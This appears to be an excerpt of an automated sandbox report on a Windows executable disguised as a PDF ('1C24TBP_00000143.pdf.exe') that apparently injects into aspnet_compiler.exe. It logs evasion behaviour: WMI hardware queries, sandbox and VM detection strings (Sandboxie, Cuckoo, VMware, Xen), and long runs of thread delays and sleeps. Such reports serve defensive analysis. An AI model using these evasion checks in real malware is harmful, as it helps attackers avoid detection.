Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERESBIEDLL.DLLFCUCKOOMON.DLLGWIN32_PROCESS.HANDLE='{0}'HPARENTPROCESSIDICMDJSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREKVERSIONLSERIALNUMBERNVMWARE\|VIRTUAL\|A M I\|XENOSELECT * FROM WIN32_COMPUTERSYSTEMPMANUFACTURERQMODELRMICROSOFT\|VMWARE\|VIRTUALSJOHNTANNAUXXXXXXXX

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Memory allocated: 1F478FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Memory allocated: 1F47A9E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 16985E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 1699F7A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595405	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Window / User API: threadDelayed 7030	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Window / User API: threadDelayed 1506	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 9129	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 727	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5696	Thread sleep count: 7030 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5696	Thread sleep count: 1506 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99849s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99489s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99131s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98646s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98527s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98416s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -98156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97982s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97307s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -97077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -96093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95934s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95826s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95590s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95263s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 5376	Thread sleep time: -95140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 6944	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe TID: 6944	Thread sleep time: -41958s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 2688	Thread sleep count: 9129 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 2688	Thread sleep count: 727 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595405s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5204	Thread sleep time: -594640s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99849	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99718	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99489	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99250	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99131	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Thread delayed: delay time: 98889	Jump to behavior
